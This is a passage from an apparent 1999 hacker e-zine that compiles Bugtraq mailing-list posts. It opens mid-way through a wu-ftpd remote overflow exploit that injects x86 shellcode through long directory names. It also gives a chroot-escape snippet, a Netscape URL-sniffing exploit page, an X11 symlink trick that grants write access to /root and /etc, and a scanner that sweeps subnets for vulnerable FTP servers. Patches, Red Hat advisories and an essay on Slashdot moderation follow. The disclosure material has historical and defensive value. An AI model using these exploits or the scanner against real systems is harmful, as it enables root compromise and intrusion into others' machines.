codeaddr = 0x0805ac81;
}

printf ( "user %s\n", username );

printf ( "pass %s\n", password );

printf ( "cwd %s\n", initialdir );

varlen = bufoffset - strlen ( initialdir );
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 210;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 170;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';
vardir[varlen] = 0;
printf ( "mkd %s\n", vardir );
printf ( "cwd %s\n", vardir );

varlen = 250;
for ( i = 0; i < varlen; i++ )
vardir[i] = 'x';

for ( i = 0; i < sizeof ( x86_shellcode0 ); i++ )
vardir[i] = x86_shellcode0[i];
j = 0;
for ( i = sizeof ( x86_shellcode0 ); j < 32; i++ )
{
vardir[i] = ( char ) ( x86_shellcode1[j++] + 0x32 );
}

pcodeaddr = ( int * ) &( vardir[varlen] );
*pcodeaddr = codeaddr;
vardir[varlen+4] = 0;

printf ( "mkd %s\n", vardir );

}

----------------------------------------------------------------------

Date: Fri, 26 Mar 1999 14:08:25 +0200
From: Artem Malyshev <artem@AM.ALEXRADIO.COM>
To: BUGTRAQ@netspace.org
Subject: Re: another ftp exploit (fwd)

> /* To break chroot we have to...
>
> fd = open ( ".", O_RDONLY );
> mkdir ( "hax0r", 0666 );
> chroot ( "hax0r" );
> fchdir ( fd );
> for ( i = 0; i < 254; i++ )
> chdir ( ".." );
> chroot ( "." );
>
> */


Too complex for standart linux
All we have to do to break chroot is:

mkdir("/sh"); // we already have string "/sh" in memory as a part of
// "/bin/sh"
chroot("/sh");
chroot("../../../../../../../../../"); // a number of "../" here,
// I used 0x10

Last string can be built is stack with a simple loop
Tested on linux 2.2.1

-am


@HWA


29.0 Netscape 4.51 allows url sniffing from another window , exploit and patch
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Thu, 25 Mar 1999 20:07:52 +0200
From: Georgi Guninski <joro@NAT.BG>
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator 4.51 allows sniffing of URLs from another window

There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT
(probably others?), which allows sniffing URLs from another window.
The exploit uses the ability to execute JavaScript code from specially
designed URLs in the javascript console window, when an error is deliberately
invoked.

Demonstration and source is available at:
http://www.nat.bg/~joro/b11.html

       (The exploit does not work if you are behind some versions of a squid proxy. 
If you do not see your URL in a message box, try reloading the main page).

Workaround: Disable JavaScript.

Regards,
Georgi Guninski

----------Demonstration and source----------
http://www.nat.bg/~joro/b11.html
--------------------------------------------
<html>
<head>
<title>Control window</title>
</head>
<frameset cols="0,*">
<frame src="wysiwyg://1/file:///?<SCRIPT>s='Your URL is: '+document.links[document.links.length-2];alert(s);top.MochaOutput.location = 'javascript:@clear';top.close();</SCRIPT>" name="err">
<frame src="b11main.html">
</frameset>
</html>

--------------------------------------------
http://www.nat.bg/~joro/b11main.html
--------------------------------------------
<HTML>
<HEAD><TITLE>
Control Window
</TITLE></HEAD>

<SCRIPT>

tracked=window.open();
tracked.document.open();
tracked.document.write("<HTML><HEAD><TITLE>Tracked window</TITLE></HEAD>");
tracked.document.write("There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>");
tracked.document.write("Type your URL in the location bar or choose a bookmark.<BR>");
tracked.document.write("Wait until the document is loaded, then click 'Show URL' in the 'Control window'.<BR>");
tracked.document.write("This exploit needs Javascript enabled.<BR>");
tracked.document.close();

function show()
{
tracked.location="javascript:error";
top.err.location="javascript:error";
top.err.location="javascript:";
}
</SCRIPT>

There is a bug in Netscape Communicator 4.51,4.5/Win95, 4.08/WinNT (probably others?), which allows sniffing URLs from another window.<BR>
This page tracks the URLs the user visits in another window.<BR>
Enter your URL in the 'Tracked window'. Wait until the document is loaded, then click 'Show URL'.<BR>
This exploit needs Javascript enabled.<BR>
Workaround: Disable Javascript.

<FORM>
<INPUT TYPE=BUTTON VALUE="Show URL" onclick="setTimeout('show()',1000)">
</FORM>
<HR>
Written by <A HREF="http://www.nat.bg/~joro">Georgi Guninski</A>


@HWA

30.0 X11R6 rewt compromise exploit
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Sun, 21 Mar 1999 21:34:48 -0800
From: in.telnetd <telnetd@DOEMILL.SHOCKING.COM>
To: BUGTRAQ@netspace.org
Subject: X11R6 NetBSD Security Problem

Hey
If this has already been brought up, you have the right to stone me to
death, But I havent seen it and ive searched, so here it is:

I was fooling around today, and decided to rm /tmp/.X11-unix and then make
a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed
up /etc/passwd and
ln -s /etc/passwd /tmp/.X11-unix
and then startx'd as normal user acount, But X wouldnt start, it
complained and said "is not a directory" So, I made a symbolic link from
/root to /tmp/.X11-unix, and startx'd as a normal user, and was suprised
to have write access to /root.
I was able to write new files to /root but was not able to overright or
change files, i was able to make a "+ +" .rhosts though.
I did this to /etc also, changed it from:

drwxr-xr-x

To:

drwxrwxrwt

with:

telnetd ~$ ln -s /etc /tmp/.X11-unix
telnetd ~$ startx

I have tested this via a remote telnet sesion also, It works if you are
able to startx and X isnt already running,
I swung my chair around and got on my gateway, telneted to stinky, logged
in as a normal user, ln -s /etc /tmp/.X11-unix, startx'd remotly, Saw
the X startup crap, looked behind me and saw X starting on stinky, I
turned to my gateway and stoped X, and had write access to /etc.

wh00t@$#!$

The only real thing I can think of for this to be usefull is .rhosts in
/root...
later
telnetd@doemill.shocking.com

-----------------------------------------------------------------------------

Date: Sun, 21 Mar 1999 21:41:40 -0800
From: in.telnetd <telnetd@DOEMILL.SHOCKING.COM>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

oops, i forgot to say, this was on NetBSD 1.3.3, fresh install
if you could apend this to my last message, it would be apreciated aleph1

-----------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 17:20:26 -0800
From: /usr/libexec/telnetd <telnetd@DOEMILL.SHOCKING.COM>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

Well, when theres a reboot, /tmp/ is cleared. And If you havent started X
yet, it could be a problem. This isnt and ultra spiffy important problem,
just thought I would bring it up.


> drwxrwxrwt 2 root root 1024 Mar 25 10:52 .X11-unix/
>
> I'd like to see a non-root user delete that from /tmp. Many systems have this
> in place like this, since root is the first to log into X. Systems that do not
> have this directory owned by root should chown it.
>
> Taral
>

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 23:41:02 +0200
From: Petras Sinkevicius <petras@BEBRAS.DAMMIT.LT>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

On Sun, 21 Mar 1999, in.telnetd wrote:

> oops, i forgot to say, this was on NetBSD 1.3.3, fresh install
> if you could apend this to my last message, it would be apreciated aleph1
>

This also works under Linux, X11 v3.3.3, links to directories and files

----
bebras@petras:/tmp> ln -s /etc/group /tmp/.X11-unix
bebras@petras:/tmp> ls -l /etc/group
-rw-r--r-- 1 root root 336 Mar 6 13:56 /etc/group
bebras@petras:/tmp> startx
_X11TransSocketUNIXConnect: Can't connect: errno = 111
giving up.
xinit: Connection refused (errno 111): unable to connect to X server
xinit: No such process (errno 3): Server error.
bebras@petras:/tmp> ls -l /etc/group
-rwxrwxrwt 1 root root 336 Mar 6 13:56 /etc/group*
----

--
Drakosha
Petras Sinkevicius
petras@bebras.dammit.lt

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 21:21:20 +0100
From: Matthieu Herrb <matthieu@laas.fr>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

in.telnetd wrote (in a message from Sunday 21)
>
> telnetd ~$ ln -s /etc /tmp/.X11-unix
> telnetd ~$ startx

The following patch should fix this:

Index: xc/lib/xtrans/Xtransint.h
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtransint.h,v
retrieving revision 1.1.1.2
diff -u -r1.1.1.2 Xtransint.h
--- xc/lib/xtrans/Xtransint.h 1998/11/28 08:26:08 1.1.1.2
+++ xc/lib/xtrans/Xtransint.h 1999/03/26 08:20:27
@@ -455,6 +455,12 @@
#endif
);

+static int trans_mkdir (
+#if NeedFunctionPrototypes
+ char *, /* path */
+ int /* mode */
+#endif
+);

/*
* Some XTRANSDEBUG stuff
Index: xc/lib/xtrans/Xtranslcl.c
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtranslcl.c,v
retrieving revision 1.1.1.4
diff -u -r1.1.1.4 Xtranslcl.c
--- xc/lib/xtrans/Xtranslcl.c 1999/01/08 17:31:44 1.1.1.4
+++ xc/lib/xtrans/Xtranslcl.c 1999/03/26 08:20:32
@@ -444,9 +444,11 @@
#else
mode = 0777;
#endif
-
- mkdir(X_STREAMS_DIR, mode);
- chmod(X_STREAMS_DIR, mode);
+ if (trans_mkdir(X_STREAMS_DIR, mode) == -1) {
+ PRMSG (1, "PTSOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_STREAMS_DIR, errno, 0);
+ return(-1);
+ }

if( (fd=open(server_path, O_RDWR)) >= 0 ) {
#if 0
@@ -724,9 +726,11 @@
#else
mode = 0777;
#endif
-
- mkdir(X_STREAMS_DIR, mode);
- chmod(X_STREAMS_DIR, mode);
+ if (trans_mkdir(X_STREAMS_DIR, mode) == -1) {
+ PRMSG (1, "NAMEDOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_STREAMS_DIR, errno, 0);
+ return(-1);
+ }

if(stat(server_path, &sbuf) != 0) {
if (errno == ENOENT) {
@@ -1044,10 +1048,18 @@
mode = 0777;
#endif

- mkdir(X_STREAMS_DIR, mode); /* "/dev/X" */

- chmod(X_STREAMS_DIR, mode);
- mkdir(X_ISC_DIR, mode); /* "/dev/X/ISCCONN" */
- chmod(X_ISC_DIR, mode);
+ /* "/dev/X" */
+ if (trans_mkdir(X_STREAMS_DIR, mode) == -1) {
+ PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_STREAMS_DIR, errno, 0);
+ return(-1);
+ }
+ /* "/dev/X/ISCCONN" */
+ if (trans_mkdir(X_ISC_DIR, mode) == -1) {
+ PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_ISC_DIR, errno, 0);
+ return(-1);
+ }

unlink(server_path);

@@ -1072,8 +1084,11 @@
*/
#define X_UNIX_DIR "/tmp/.X11-unix"

- mkdir(X_UNIX_DIR, mode);
- chmod(X_UNIX_DIR, mode);
+ if (trans_mkdir(X_UNIX_DIR, mode) == -1) {
+ PRMSG (1, "ISCOpenServer: mkdir(%s) failed, errno = %d\n",
+ X_UNIX_DIR, errno, 0);
+ return(-1);
+ }

unlink(server_unix_path);

Index: xc/lib/xtrans/Xtranssock.c
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtranssock.c,v
retrieving revision 1.1.1.4
diff -u -r1.1.1.4 Xtranssock.c
--- xc/lib/xtrans/Xtranssock.c 1999/01/08 17:31:46 1.1.1.4
+++ xc/lib/xtrans/Xtranssock.c 1999/03/26 08:20:38
@@ -946,8 +946,11 @@
#else
mode = 0777;
#endif
- mkdir (UNIX_DIR, mode);
- chmod (UNIX_DIR, mode);
+ if (trans_mkdir(UNIX_DIR, mode) == -1) {
+ PRMSG (1, "SocketUNIXCreateListener: mkdir(%s) failed, errno = %d\n",
+ UNIX_DIR, errno, 0);
+ return TRANS_CREATE_LISTENER_FAILED;
+ }
#endif

sockname.sun_family = AF_UNIX;
@@ -1041,8 +1044,11 @@
#else
mode = 0777;
#endif
- mkdir (UNIX_DIR, mode);
- chmod (UNIX_DIR, mode);
+ if (trans_mkdir(UNIX_DIR, mode) == -1) {
+ PRMSG (1, "SocketUNIXResetListener: mkdir(%s) failed, errno = %d\n",
+ UNIX_DIR, errno, 0);
+ return TRANS_RESET_FAILURE;
+ }
#endif

close (ciptr->fd);
Index: xc/lib/xtrans/Xtransutil.c
===================================================================
RCS file: /cvs/X11/xc/lib/xtrans/Xtransutil.c,v
retrieving revision 1.1.1.1
diff -u -r1.1.1.1 Xtransutil.c
--- xc/lib/xtrans/Xtransutil.c 1997/09/05 09:02:43 1.1.1.1
+++ xc/lib/xtrans/Xtransutil.c 1999/03/26 08:20:40
@@ -465,3 +465,32 @@

return (1);
}
+
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <errno.h>
+
+static int
+trans_mkdir(char *path, int mode)
+{
+ struct stat buf;
+
+ if (mkdir(path, mode) == 0) {
+ /* I don't know why this is done, but it was in the original
+ xtrans code */

+ chmod(path, mode);
+ return 0;
+ }
+ /* If mkdir failed with EEXIST, test if it is a directory with
+ the right modes, else fail */

+ if (errno == EEXIST) {
+ if (stat(path, &buf) != 0) {
+ return -1;
+ }
+ if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) {
+ return 0;
+ }
+ }
+ /* In all other cases, fail */
+ return -1;
+}
--
Matthieu

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 13:55:13 +0100
From: Pavel Machek <pavel@BUG.UCW.CZ>
To: BUGTRAQ@netspace.org
Subject: not only NetBSD [was Re: X11R6 NetBSD Security Problem]

Hi!

> If this has already been brought up, you have the right to stone me to
> death, But I havent seen it and ive searched, so here it is:
>
> I was fooling around today, and decided to rm /tmp/.X11-unix and then make
> a symbolic link from a file to /tmp/.X11-unix and then startx. So I backed
> up /etc/passwd and
> ln -s /etc/passwd /tmp/.X11-unix
> and then startx'd as normal user acount, But X wouldnt start, it
> complained and said "is not a directory" So, I made a symbolic link from
> /root to /tmp/.X11-unix, and startx'd as a normal user, and was suprised
> to have write access to /root.

I tried to reproduce on 2.2.4 linux using

XFree86 Version 3.3.2 / X Window System
(protocol Version 11, revision 0, vendor release 6300)
Release Date: March 2 1998
If the server is older than 6-12 months, or if your card is
newer
than the above date, look for a newer version before reporting
problems. (see http://www.XFree86.Org/FAQ)

. I'm not able to get write access to /etc, still I'm able to create
file

srwxrwxrwx 1 root root 0 Mar 26 13:48 X0=

in previously unwritable directory. Bug, it seems. [There was some
talk about /tmp/.X11-unix directories, and I think that this problem
might very well get _worse_ with new 3.3.3 release. Please check.]

Pavel

--
I'm really pavel@atrey.karlin.mff.cuni.cz. Pavel
Look at http://atrey.karlin.mff.cuni.cz/~pavel/ ;-).

-----------------------------------------------------------------------------

Date: Sun, 28 Mar 1999 19:01:41 -0800
From: Kevin Vajk <kvajk@RICOCHET.NET>
To: BUGTRAQ@netspace.org
Subject: Re: X11R6 NetBSD Security Problem

This patch looks pretty good. (Much better than the current situatiuon!!!)

A few comments:

On Fri, 26 Mar 1999, Matthieu Herrb wrote:
> + if (errno == EEXIST) {
> + if (stat(path, &buf) != 0) {

This should be lstat().

> + if (S_ISDIR(buf.st_mode) && ((buf.st_mode & ~S_IFMT) == mode)) {
> + return 0;
> + }
> + }

I think you'll want to check the owner of the directory, too.

- Kevin Vajk
<kvajk@ricochet.net>

-----------------------------------------------------------------------------

Date: Wed, 31 Mar 1999 11:12:52 -0600
From: Patrick J. Volkerding <gonzo@RRNET.COM>
To: BUGTRAQ@netspace.org
Subject: XFree86 security problem

On Mon, 29 Mar 1999, Domas Mituzas wrote:
> why is RedHat delaying release of this package
> as it smells like root takeover (it was too easy
> to change /etc/ and /etc/passwd permissions to
> something neat).
>
> [...]
>
> This is cross-platform bug, as I found it in
> all OS that run XFree86 3.3.3 server. As far as
> I know it is on every Linux distribution (especially
> newest ones) and BSD's.

Before flying off the handle at Red Hat, you might consider that quite
possibly they aren't vulnerable to this problem. As far as I can tell, if
the system ships with a /tmp/.X11-unix/ directory already in place, and
none of the system scripts delete it, then there's no security problem
since nobody can put a rogue symlink at that location in /tmp.

I know Slackware Linux isn't vulnerable to this problem, and never was,
and I don't think we're the only ones to ship a Linux OS that provides a
pre-existing /tmp/.X11-unix/.

--
Patrick J. Volkerding
Slackware Linux Project


@HWA

31.0 Yet another wu-ftpd scanner by 03m0s1s
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Wed, 24 Mar 1999 06:29:20 PST
From: baku@EXCITE.COM
To: BUGTRAQ@netspace.org
Subject: WUftp scanner

Hi, aleph1
this is a quick and dirty scanner I wrote to look for vulernable wu-ftpd
servers.
<---------wscan.c------>
#include <netdb.h>

#define FTPPORT 21
#define VERBOSE 1

int
main (int argc, char **argv)
{
struct hostent *hp;
struct in_addr addr;
struct sockaddr_in s;
u_char *buf[280];
int p, i;


if (argc == 1)
{
printf("WUftpd Buffer overflow scanner.\n");
printf("Written by 03m0s1s 3/19/1999\n");
printf ("Usage: %s <hostname>\n",argv[0]);
exit (1);
}

hp = gethostbyname (argv[1]);
if (!hp) exit (1);

bcopy (hp->h_addr, &addr, sizeof (struct in_addr));
p = socket (s.sin_family = 2, 1, IPPROTO_TCP);
s.sin_port = htons (FTPPORT);
s.sin_addr.s_addr = inet_addr (inet_ntoa (addr));
connect (p, &s, sizeof (s));
alarm (4); /*Time out after 4 seconds */
read (p, buf, 255); /* Grab the banner*/

if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)"))
{
if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999"))
printf ("%s is patched.\n", inet_ntoa (addr));
else
printf ("%s is vulnerable.\n", inet_ntoa (addr));
/*It must be the "Mon Aug 3 19:17:20 EDT 1998) ready." banner. */
}
else
printf ("%s does not look BETA-18.\n", inet_ntoa (addr));

if (VERBOSE)
printf ("%s\n\n", buf);
write (p,"bye\n",4); /*We just want the banner no need to stick around.*/

}
<------end wuscan.c---------->
<-------wuss perl script----->
#!/usr/bin/perl -w
#Automate class C subnet scan, it doesnt check to see if the host is up
#could add a ping routine in here.
#Syntax ./wuss [aaa.bbb.ccc]

$net = $ARGV[0];
$START=1;
$END=254;


while ($START < $END) {
$HOST ="$net.$START";
print `./wuscan $HOST`;
$START = $START + 1;
}
<------wuss--------->

-----------------------------------------------------------------------------

Date: Thu, 25 Mar 1999 22:25:39 -0500
From: Gregory A Lundberg <lundberg+wuftpd@VR.NET>
To: BUGTRAQ@netspace.org
Subject: Re: WUftp scanner

On Wed, 24 Mar 1999 baku@EXCITE.COM wrote:

> if (strstr (buf, "Version wu-2.4.2-academ[BETA-18](1)"))

No. Way to strict. You'll miss people who touched ftpcmd.y and
recompiled:
Version wu-2.4.2-academ[BETA-18](2)
And you'll miss earlier versions which are vulnerable, say:
Version wu-2.4.2-academ[BETA-12]
And you'll miss derivatives which are vulnerable, like one of mine:
Version wu-2.4.2-academ[BETA-18-VR6]

> {
> if (strstr (buf, "Mon Jan 18 19:19:31 EST 1999"))
> printf ("%s is patched.\n", inet_ntoa (addr));

No. That's the date and time _you_ compiled the daemon. The target
machine was probably compiled some other time.

--

Gregory A Lundberg Senior Partner, VRnet Company
1441 Elmdale Drive lundberg+wuftpd@vr.net
Kettering, OH 45409-1615 USA 1-800-809-2195

-----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 10:05:54 -0700
From: Scott Stone <sstone@TURBOLINUX.COM>
To: BUGTRAQ@netspace.org
Subject: Re: WUftp scanner

On Wed, 24 Mar 1999 baku@EXCITE.COM wrote:

> Hi, aleph1
> this is a quick and dirty scanner I wrote to look for vulernable wu-ftpd
> servers.

Sorry, but this is kind of dumb. This will check to make sure that you're
using a specific build of wu-ftpd... but what if you rebuilt it yourself?
then the timestamp will be different. The timestamp reflects the
time/date/zone in which this particular server binary was COMPILED. So
basically all this program tells me is if I'm using Redhat's prebuilt
wu-ftpd binary, right? My TurboLinux wu-ftpd RPM is correctly patched,
but it will say that it's 19:19:11 PST 1999 since that's when I built it,
and I built it in California.


@HWA


32.0 RedHat linux security advisories
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

- -----BEGIN PGP SIGNED MESSAGE-----


Security vulnerabilities have been identified in various packages that
ship with Red Hat Linux.


Red Hat would like to thank the members of the BUGTRAQ mailing list,
the members of the Linux Security Audit team, and others. All users
of Red Hat Linux are encouraged to upgrade to the new packages
immediately. As always, these packages have been signed with the
Red Hat PGP key.


mutt, pine:
- - -----------
An problem in the mime handling code could allow a remote user
to execute certain commands on a local system.


Red Hat Linux 5.2
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/mutt-0.95.4us-0.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/alpha/pine-4.10-1.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/mutt-0.95.4us-0.i386.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/i386/pine-4.10-1.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/mutt-0.95.4us-0.sparc.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/sparc/pine-4.10-1.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/mutt-0.95.4us-0.src.rpm
rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/pine-4.10-1.src.rpm


Red Hat Linux 5.1
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.1/alpha/mutt-0.95.4us-0.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/alpha/pine-3.96-8.1.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/5.1/i386/mutt-0.95.4us-0.i386.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/i386/pine-3.96-8.1.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/5.1/sparc/mutt-0.95.4us-0.sparc.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/sparc/pine-3.96-8.1.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/mutt-0.95.4us-0.src.rpm
rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/pine-3.96-8.1.src.rpm


Red Hat Linux 5.0
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.0/alpha/mutt-0.95.4us-0.alpha.rpm
rpm -Uvh ftp://updates.redhat.com/5.0/alpha/pine-3.96-7.1.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/5.0/i386/mutt-0.95.4us-0.i386.rpm
rpm -Uvh ftp://updates.redhat.com/5.0/i386/pine-3.96-7.1.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/mutt-0.95.4us-0.src.rpm
rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/pine-3.96-7.1.src.rpm


Red Hat Linux 4.2
- - -----------------
alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/pine-3.96-7.0.alpha.rpm
i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/pine-3.96-7.0.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/pine-3.96-7.0.sparc.rpm
source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/pine-3.96-7.0.src.rpm


(Mutt was not shipped with Red Hat Linux 4.2)


sysklogd
- - --------
An overflow in the parsing code could lead to crashes of the system
logger.


Red Hat Linux 5.0,5.1,5.2:
- - --------------------------
alpha: rpm -Uvh ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-0.5.alpha.r
pm
i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-0.5.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-0.5.sparc.r
pm
source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm


Red Hat Linux 4.2:
- - ------------------
alpha: rpm -Uvh ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.0.alpha.r
pm
i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.0.i386.rpm
sparc: rpm -Uvh ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.0.sparc.r
pm
source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.0.src.rpm


zgv
- - ---
Local users could gain root access.


Red Hat Linux 5.2:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/5.2/i386/zgv-3.0-7.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.2/SRPMS/zgv-3.0-7.src.rpm


Red Hat Linux 5.1:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/5.1/i386/zgv-3.0-5.1.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.1/SRPMS/zgv-3.0-5.1.src.rpm


Red Hat Linux 5.0:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/5.0/i386/zgv-3.0-1.5.0.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/5.0/SRPMS/zgv-3.0-1.5.0.src.rpm


Red Hat Linux 4.2:
- - ------------------
i386: rpm -Uvh ftp://updates.redhat.com/4.2/i386/zgv-3.0-1.4.2.i386.rpm
source: rpm -Uvh ftp://updates.redhat.com/4.2/SRPMS/zgv-3.0-1.4.2.src.rpm


Cristian
- - --
- - ----------------------------------------------------------------------
Cristian Gafton -- gafton@redhat.com -- Red Hat Software, Inc.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
UNIX is user friendly. It's just selective about who its friends are.

@HWA


33.0 The Suburbanization of Slashdot an internet institution by Pasty Drone..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


The Suburbanization of Slashdot
by Pasty Drone <a href="mailto:pastydrone@newstrolls.com">email</a><br>


So I surfed into Slashdot last week, expecting the usual motley group of posters,
flamers and idiots that I have come to love watching interact in the great theater
that is Threads. But as I looked around, I became aware that gone were the weeds of
the Meepts!, the empty, unpainted houses of the Firsts!, and the nefarious crackdens
of the flamers...all around me was a chilling non-organic robot-like civility coming
from posts that said things like "I like Jon" and "Slashdot is great". The posts were
smooth and straight and as boring as a well-kept lawn. The unpleasant, the idiotic,
the taboo had vanished from my screen.


Slashdot <a href="http://www.slashdot.org/article.pl?sid=99/03/23/1058204"> had moved
to the suburbs. </a> And why should <a href="http://www.newstrolls.com/news/dev/whois.htm">
I, the CEO of NewsTrolls</a> care what happens on Slashdot? It's Rob's site he can do with
it what he wants. And yet...and yet...

I suppose to understand my feelings about Slashdot I have to explain NewsTrolls' relationship
with them. When we started NewsTrolls in September of 1998, we were already well-established
as daily readers of Slashdot. Even before our beginning as our own site, I would regularly
link to Slashdot articles in the daily trolling I did in HotWired's old Media Rant Threads.
When NewsTrolls, after collective debate via posts, decided to have advertising on the site, we at
<a href="http://www.newstrolls.com/news/dev/troll1123.htm">first only ran with Slashdot's banner
</a> as a tribute to their work. At that time Slashdot was also running our NewsTrolls banner.

Another similarity we share is that when NewsTrolls started out <a href="http://www.newstrolls.com/news/dev/guest/archive.htm">
Jon Katz contributed articles to us </a>, but after a while he moved over to publish on Slashdot
I can't really fault him for moving...as a writer whose persona is dependent on the number of
Netizens who read and like him, it made business sense to go where the numbers were bigger.
And Slashdot is definitely a much larger site than NewsTrolls.

Running a site dedicated to free speech with a Threads board that can be vociferous on a good
day and downright cruel on a bad one (myself included) is a giant pain in the ass. I understand
exactly (albeit on a smaller scale) what Rob's frustrations are. How do you keep the quality
up and the spam down?

In Slashdot's case, Rob has decided to appoint moderators to rank posts and then let users
customize their viewing options so to allow them to choose which posts to view. Sounds reasonable,
but there are two major problems.

1. The default is set at 0 for new users or users not logged in. Therefore, no posts that have been
ranked below 0 are seen. While the option is there for the readers to change to view all posts,
anyone who has been on the Internet more than 5 years knows we are constantly dealing with newbies
who are lucky to navigate a page, let alone feel secure enough to change options. New users who are
not computer-savvy stick with defaults.
2. The moderators who number over 400 were chosen by a smaller group of under 30 who found their posts
to be useful and informative. These 400+ now rank the rest of the posts. The hope is that the
moderators will spend more time grading up and only grading down the non-useful posts. Unfortunately,
posters who express dissenting opinions in non-traditional manners are being downgraded, too.

When the moderation article first came out, <a href="http://www.newstrolls.com/news/threads/thread.cgi?436,0,,1">
I started a thread to discuss the ramifications of moderating threads.</a>
Regulars of NewsTrolls and readers from /. have been debating the issue with many excellent points.
Now here's my half-rant/half-loveletter on Slashdot...
To me, what I have love about Slashdot is that has epitomized the bizarre bazaar of open source.
Scriptkiddies, geeks, phreaks, hackers, crackers, wannabes, sysadmins, developers, suits, all hollering
at the story presented, at each other, at the world in general sometimes. Maybe what others call noise, I
call music. I loved to see how a post on KDE could elicit useful links, suggestions, inside scoops,
clueless questions, and loud dissenters from the GNOME crowd. Or how posters would take sides on Perens
or Raymond with the bloodthirst of gamblers at a cockfight. Or the hushed awe, meaningful whispers, and
conspiracy theories that flew whenever Transmeta was mentioned. Or the joyful solidarity as a new Linux
kernel was posted. To me, the organic twists and turns a thread would take was just as enlightening as
the articles to which they were attached. The grammar flames were like a call-and-response between posters
who had obviously gone through the same motions before. The glorious meept! nonsense posts was like throwing
in moments straight out of Theater of the Absurd. The First Posts! were crows of delight that said:
"I'm here!, You can see me!". The whole cacophonous din was like walking down Times Square in rush hour
when Hansen is in the 2nd Floor MTV studios. It was ALIVE! It had SOUL!
Moderation changes all of that. It cleans up Times Square faster than Disney with a fistful of Giuliani
